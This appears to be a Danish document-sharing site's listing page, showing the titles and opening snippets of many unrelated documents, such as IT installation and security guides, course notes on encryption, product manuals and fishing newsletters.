TDCs Signaturserver. 11/05 - Version 1.0 2005 TDC Erhverv Sikkerhed og certifikater TDCs Signaturserver Side 2 Indhold Indledning...3 Teknisk projekt... 3 Tekniske forudsætninger... 3 Installation af klienten... 4 Udstedelse af signatur... 4 Anvendelse af signaturen... 6 Eksport af signaturen...

Læs mere

Vejledning til Teknisk opsætning

Vejledning til Teknisk opsætning Vejledning til Teknisk opsætning v. 1.0 Adm4you, 2010. Indhold Kort om denne vejledning... 3 Generelt om easyourtime... 3 Installation af databasen... 3 Sikkerhed og rettigheder... 4 SQL Login... 4 Rettigheder

Læs mere

Fjernadgang til BEC s systemer via Portal2

Fjernadgang til BEC s systemer via Portal2 Fjernadgang til BEC s systemer via Portal2 - tilgå applikationer og arbejdsplads via webbaseret portal (UAG) Udarbejdet af: Niklas Petersen Gældende fra: 24-08-2015 Version Forfatter Dato Dokumentstatus

Læs mere

Digital Forvaltning 3. kursusgang 21.9.04

Digital Forvaltning 3. kursusgang 21.9.04 Digital Forvaltning 3. kursusgang 21.9.04 Standardisering og innovation Opponentoplæg v. Niels Jørgensen Innovation CPR 1968 CPR 2004 Technology:.. A method, process etc. for handling a specific technical

Læs mere

Kursusgang 3: Autencificering & asymmetrisk kryptering. Krav til autentificering. Kryptering som værktøj ved autentificering.

Kursusgang 3: Autencificering & asymmetrisk kryptering. Krav til autentificering. Kryptering som værktøj ved autentificering. Krav til autentificering Vi kan acceptere, at modtager (og måske afsender) skal bruge hemmelig nøgle Krav til metode: må ikke kunne brydes på anden måde end ved udtømmende søgning længde af nøgler/hemmeligheder/hashkoder

Læs mere

Datatekniker med programmering som speciale

Datatekniker med programmering som speciale Datatekniker med programmering som speciale H1 H1 varer ti uger bestående af ti uddannelsesspecifikke fag. Indhold På H1 beskæftiger du dig med at lære at programmere helt fra bunden. Forløbet er designet

Læs mere

Microservices. Hvad er det og hvordan kommer du i gang?

Microservices. Hvad er det og hvordan kommer du i gang? Microservices Hvad er det og hvordan kommer du i gang? Introduktion til Microservices Softwareudvikling Historie Softwarearkitektur Mentoring 10 konsulenter Bezos befaling All teams will henceforth expose

Læs mere

Projekt: VAX NemHandel 4.0

Projekt: VAX NemHandel 4.0 Ejer: mysupply ApS Projekt: VAX NemHandel 4.0 Emne: Dette dokument beskriver de tekniske specifikationer for VAX NemHandel 4.0 samt krav til miljøet, herunder hardware og software, hvori VAX NemHandel

Læs mere

SAP R/3. Henrik Kroos

SAP R/3. Henrik Kroos SAP R/3 Henrik Kroos Velkommen.. Spørg undervejs Præsentation af mig Præsentation af jer Hvad er SAP?? SAP er et tysk firma startet af 5 tidligere IBM-folk i 1972 Hjemsted i Waldorf Tyskland, (nær Frankfurt)

Læs mere

User guide - For testing SFTP and HTTP/S data communication

User guide - For testing SFTP and HTTP/S data communication User guide - For testing SFTP and HTTP/S data communication with Nets Danmark A/S P. 1-9 Index General information... 3 Introduction... 3 Rights... 3 Limitations... 3 Prerequisites... 3 Preparations...

Læs mere

Trolling Master Bornholm 2016 Nyhedsbrev nr. 8

Trolling Master Bornholm 2016 Nyhedsbrev nr. 8 Trolling Master Bornholm 2016 Nyhedsbrev nr. 8 English version further down Der bliver landet fisk men ikke mange Her er det Johnny Nielsen, Søløven, fra Tejn, som i denne uge fangede 13,0 kg nord for

Læs mere

Teknologispredning i sundhedsvæsenet DK ITEK: Sundhedsteknologi som grundlag for samarbejde og forretningsudvikling

Teknologispredning i sundhedsvæsenet DK ITEK: Sundhedsteknologi som grundlag for samarbejde og forretningsudvikling Teknologispredning i sundhedsvæsenet DK ITEK: Sundhedsteknologi som grundlag for samarbejde og forretningsudvikling 6.5.2009 Jacob Schaumburg-Müller jacobs@microsoft.com Direktør, politik og strategi Microsoft

Læs mere

Varenr.: 553925 90 højre 553926 90 venstre 554027 90º højre med coating 554028 90º venstre med coating

Varenr.: 553925 90 højre 553926 90 venstre 554027 90º højre med coating 554028 90º venstre med coating DK GH Skiftespor Varenr.: 55395 90 højre 55396 90 venstre 55407 90º højre med coating 55408 90º venstre med coating 553991 60º højre 553995 60º venstre 551058 60º højre med coating 551059 60º venstre med

Læs mere

LUDUS Web Installations- og konfigurationsvejledning

LUDUS Web Installations- og konfigurationsvejledning LUDUS Web Installations- og konfigurationsvejledning Indhold LUDUS Web Installations- og konfigurationsvejledning... 1 1. Forudsætninger... 2 2. Installation... 3 3. Konfiguration... 9 3.1 LUDUS Databasekonfiguration...

Læs mere

SEPA Direct Debit. Mandat Vejledning 2013.03.15. Nets Lautrupbjerg 10 DK-2750 Ballerup

SEPA Direct Debit. Mandat Vejledning 2013.03.15. Nets Lautrupbjerg 10 DK-2750 Ballerup SEPA Direct Debit Mandat Vejledning 2013.03.15 Nets Lautrupbjerg 10 DK-2750 Ballerup Indholdsfortegnelse 1. Indledning... 3 1.1 Tilknyttet dokumentation... 3 1.2 Kontakt til Nets... 3 2. Krav til SEPA

Læs mere

Side 1 af 9. SEPA Direct Debit Betalingsaftaler Vejledning

Side 1 af 9. SEPA Direct Debit Betalingsaftaler Vejledning Side 1 af 9 SEPA Direct Debit Betalingsaftaler Vejledning 23.11.2015 1. Indledning Denne guide kan anvendes af kreditorer, som ønsker at gøre brug af SEPA Direct Debit til opkrævninger i euro. Guiden kan

Læs mere

Opsætning af MobilePBX med Kalenderdatabase

Opsætning af MobilePBX med Kalenderdatabase Opsætning af MobilePBX med Kalenderdatabase Dette dokument beskriver hvorledes der installeres Symprex Exchange Connector og SQL Server Express for at MobilePBX kan benytte kalenderadadgang via database

Læs mere

Administrator - installation og brug i Windows

Administrator - installation og brug i Windows 1 Administrator - installation og brug i Windows Det her beskrevne er IKKE noget nyt, og har været gældende siden Windows NT og version 2000, efterhånden 15-20 år eller mere. Denne artikel omhandler følgende

Læs mere

REDKEN EDUCATION 2018 LEARN BETTER. EARN BETTER. LIVE BETTER.

REDKEN EDUCATION 2018 LEARN BETTER. EARN BETTER. LIVE BETTER. REDKEN EDUCATION 2018 LEARN BETTER. EARN BETTER. LIVE BETTER. MESSAGE TO THE TRIBE OUR MISSION Redken strives to instill the principles of wealth and success to the professional salon industry. Our goal

Læs mere

WLAN sikkerhedsbegreber -- beskrivelse

WLAN sikkerhedsbegreber -- beskrivelse Denne guide er oprindeligt udgivet på Eksperten.dk WLAN sikkerhedsbegreber -- beskrivelse Indeholder en kort beskrivelse over de forskellige sikkerhedsværltøjer og standarder der findes for WLAN idag!

Læs mere

Grøn Open Access i Praksis

Grøn Open Access i Praksis Downloaded from orbit.dtu.dk on: Feb 03, 2017 Grøn Open Access i Praksis Sand, Ane Ahrenkiel Publication date: 2016 Document Version Også kaldet Forlagets PDF Link to publication Citation (APA): Sand,

Læs mere

Fjernadgang til BEC s systemer via Portal2

Fjernadgang til BEC s systemer via Portal2 Fjernadgang til BEC s systemer via Portal2 - tilgå applikationer og arbejdsplads via webbaseret portal (UAG) Udarbejdet af: Niklas Petersen Gældende fra: 24-08-2015 Version Forfatter Dato Dokumentstatus

Læs mere

Shared space - mellem vision og realitet. - Lyngby Idrætsby som case

Shared space - mellem vision og realitet. - Lyngby Idrætsby som case Downloaded from orbit.dtu.dk on: Jan 27, 2017 Shared space - mellem vision og realitet. - Lyngby Idrætsby som case Brinkø, Rikke Publication date: 2015 Document Version Peer-review version Link to publication

Læs mere

Umiddelbare kommentarer til Finansrådets ledelseskodeks af 22/

Umiddelbare kommentarer til Finansrådets ledelseskodeks af 22/ Downloaded from vbn.aau.dk on: januar 29, 2019 Aalborg Universitet Umiddelbare kommentarer til Finansrådets ledelseskodeks af 22/11-2013 Krull, Lars Publication date: 2013 Document Version Tidlig version

Læs mere

Projekt: VAX Integrator

Projekt: VAX Integrator Ejer: mysupply ApS Projekt: VAX Integrator 1.0.0.3 Emne: Teknisk specifikation - VAX Integrator 1.0.0.3 Dette dokument beskriver de tekniske specifikationer for VAX Integrator 1.0.0.3 samt krav til miljøet,

Læs mere

IIS 8.0 & 8.5 & 10.0 SSL Administration

IIS 8.0 & 8.5 & 10.0 SSL Administration IIS 8.0 & 8.5 & 10.0 SSL Administration Indholdsfortegnelse Introduktion... 3 Generering af CSR... 4 Installation af certifikat bestilt via CSR... 8 Installation af mellemudsteder certifikat... 8 Installation

Læs mere

Gode råd til netbankbrugere - sikring af en typisk hjemme-pc med adgang til netbank

Gode råd til netbankbrugere - sikring af en typisk hjemme-pc med adgang til netbank Gode råd til netbankbrugere - sikring af en typisk hjemme-pc med adgang til netbank Af BEC og FortConsult, januar 2005. Hvad kan du konkret gøre for at beskytte din pc? Målgruppe Denne vejledning er skrevet

Læs mere

IBM WebSphere Operational Decision Management

IBM WebSphere Operational Decision Management IBM WebSphere Operational Decision Management 8 0 29., WebSphere Operational Decision Management 8, 0, 0. Copyright IBM Corporation 2008, 2012. ........... 1 :......... 1 1: Decision Center....... 3 1

Læs mere

BACK-END OG DATA: ADMINISTRATION HVAD ER DE NYE MULIGHEDER MED VERSION 7.1? STEFFEN BILLE RANNES, 4. FEBRUAR 2015

BACK-END OG DATA: ADMINISTRATION HVAD ER DE NYE MULIGHEDER MED VERSION 7.1? STEFFEN BILLE RANNES, 4. FEBRUAR 2015 BACK-END OG DATA: ADMINISTRATION HVAD ER DE NYE MULIGHEDER MED VERSION 7.1? STEFFEN BILLE RANNES, 4. FEBRUAR 2015 SAS VISUAL ANALYTICS 7.1 ADMINISTRATOR Mulighed for at udføre handlinger på flere servere

Læs mere

Opera Ins. Model: MI5722 Product Name: Pure Sine Wave Inverter 1000W 12VDC/230 30A Solar Regulator

Opera Ins. Model: MI5722 Product Name: Pure Sine Wave Inverter 1000W 12VDC/230 30A Solar Regulator Opera Ins Model: MI5722 Product Name: Pure Sine Wave Inverter 1000W 12VDC/230 30A Solar Regulator I.Precautions 1. Keep the product away from children to avoid children playing it as a toy and resultinginpersonalinjury.

Læs mere

Revision af firewall. Jesper B. S. Christensen. Sikkerhed og Revision 6/7 September 2018

Revision af firewall. Jesper B. S. Christensen. Sikkerhed og Revision 6/7 September 2018 Revision af firewall Jesper B. S. Christensen Sikkerhed og Revision 6/7 September 2018 Jesper B. S. Christensen Senior Consultant Deloitte, Risk Advisory, Cyber Secure (dem I ikke har hørt om før) IT-Ingeniør,

Læs mere

SURFTOWNS SIKRINGSMILJØ. Databehandleraftalen - Bilag 1

SURFTOWNS SIKRINGSMILJØ. Databehandleraftalen - Bilag 1 SURFTOWNS SIKRINGSMILJØ Databehandleraftalen - Bilag 1 Indholdsfortegnelse Fysisk sikkerhed... 2 Logiske adgange... 2 Netværk... 2 Logning... 2 Sårbarhedsstyring... 2 Overvågning... 2 Backup... 3 Kryptering...

Læs mere

VPN-klienten SecureClient for TDC Managed Firewall

VPN-klienten SecureClient for TDC Managed Firewall Installationsvejledning VPN-klienten SecureClient for TDC Managed Firewall Denne installationsvejledning beskriver, hvordan Check Point s VPN-klient SecureClient (version NGX R60) installeres. Med SecureClient

Læs mere

SPECIALTRYKKERIETS KUNDE WEBPORTAL KOM GODT I GANG

SPECIALTRYKKERIETS KUNDE WEBPORTAL KOM GODT I GANG SPECIALTRYKKERIETS KUNDE WEBPORTAL KOM GODT I GANG Jeg håber du får fornøjelse af vores nye værktøj. WebApproval skal gøre det nemmere og mere sikkert for dig at godkende din tryksager. Har du spørgsmål,

Læs mere

Trolling Master Bornholm 2014

Trolling Master Bornholm 2014 Trolling Master Bornholm 2014 (English version further down) Den ny havn i Tejn Havn Bornholms Regionskommune er gået i gang med at udvide Tejn Havn, og det er med til at gøre det muligt, at vi kan være

Læs mere

Sikkerhed i trådløst netværk

Sikkerhed i trådløst netværk Sikkerhed i trådløst netværk Når du opsætter et trådløst netværk betyder det at du kan benytte dit netværk uden at være forbundet med kabler, men det betyder også at andre kan gøre det samme, hvis du ikke

Læs mere

PID2000 Archive Service

PID2000 Archive Service PROLON CONTROL SYSTEMS Herstedvesterstræde 56 DK-2620 Albertslund Danmark Tlf.: (+45) 43620625 Fax: (+45) 43623125 PID2000 Archive Service Bruger vejledning Juni 2002 Denne manual beskriver brugen af softwaren

Læs mere

Business Opening. Very formal, recipient has a special title that must be used in place of their name

Business Opening. Very formal, recipient has a special title that must be used in place of their name - Opening English Danish Dear Mr. President, Kære Hr. Direktør, Very formal, recipient has a special title that must be used in place of their name Dear Sir, Formal, male recipient, name unknown Dear Madam,

Læs mere

Cisco Registreret Reseller Step by Step

Cisco Registreret Reseller Step by Step Cisco Registreret Reseller Step by Step 5. september 2016 v/pia Hauberg Cisco Registreret Reseller Cisco har iværksat en registreringskampagne med det formål at alle partnere, der forhandler Cisco s produkter,

Læs mere

Security as a Service hvorfor, hvornår og hvordan. Gorm Mandsberg, gma@dubex.dk Aarhus, 13.06.2013

Security as a Service hvorfor, hvornår og hvordan. Gorm Mandsberg, gma@dubex.dk Aarhus, 13.06.2013 Security as a Service hvorfor, hvornår og hvordan Gorm Mandsberg, gma@dubex.dk Aarhus, 13.06.2013 SecaaS hvorfor, hvornår og hvordan hvad Hvorfor.. Hvornår.. Hvordan.. Disclamer: Dubex er MSSP og leverer

Læs mere

Business Opening. Very formal, recipient has a special title that must be used in place of their name

Business Opening. Very formal, recipient has a special title that must be used in place of their name - Opening Danish English Kære Hr. Direktør, Dear Mr. President, Very formal, recipient has a special title that must be used in place of their name Kære Hr., Formal, male recipient, name unknown Kære Fru.,

Læs mere

UPLOAD. Af Database og Website til Skolens Server

UPLOAD. Af Database og Website til Skolens Server UPLOAD Af Database og Website til Skolens Server INDHOLDSFORTEGNELSE Fra projekt til server... 3 Overførsel af SQL Database... 3 Eksekvering af T SQL Script... 8 Modificering af Visual Studio Projekt...

Læs mere

Navision Stat 7.0. GIS Webservice og automatiseret filindlæsning via NST. Overblik. Side 1 af 9. ØSY/CRA/MAC Opr. 20.01.15

Navision Stat 7.0. GIS Webservice og automatiseret filindlæsning via NST. Overblik. Side 1 af 9. ØSY/CRA/MAC Opr. 20.01.15 Side 1 af 9 Navision Stat 7.0 ØSY/CRA/MAC Opr. 20.01.15 GIS Webservice og automatiseret filindlæsning via NST Overblik Introduktion Denne vejledning beskriver hvordan du: installerer Navision Application

Læs mere

Vigilante: End-to-End Containment of Internet Worms. OS Seminar, DIKU efterår 2005. Præsentation af Troels Larsen.

Vigilante: End-to-End Containment of Internet Worms. OS Seminar, DIKU efterår 2005. Præsentation af Troels Larsen. Vigilante: End-to-End Containment of Internet Worms OS Seminar, DIKU efterår 2005. Præsentation af Troels Larsen. Generelt om ormebekæmpelse Ormebekæmpelse skal automatiseres, fordi orme spreder sig hurtigere

Læs mere

Administrator - installation og brug i Windows

Administrator - installation og brug i Windows 1 Administrator - installation og brug i Windows Grundforfattet af Allan, OZ1DIS, redigeret/udgivet af Palle, OZ6YM Det her beskrevne er IKKE noget nyt, og har været gældende siden Windows NT og version

Læs mere

QUICK START Updated: 18. Febr. 2014

QUICK START Updated: 18. Febr. 2014 QUICK START Updated: 18. Febr. 2014 For at komme hurtigt og godt igang med dine nye Webstech produkter, anbefales at du downloader den senest opdaterede QuickStart fra vores hjemmeside: In order to get

Læs mere

Kosmos og Kaos en case om målrettet innovation

Kosmos og Kaos en case om målrettet innovation Kosmos og Kaos en case om målrettet innovation IKI 12.3.2009 Præsentation ved Thomas Mathiasen Faciliterer innovation Opfindelser på opfordring Få de rigtige idéer og før dem ud i livet Case: Mælkeanalyse

Læs mere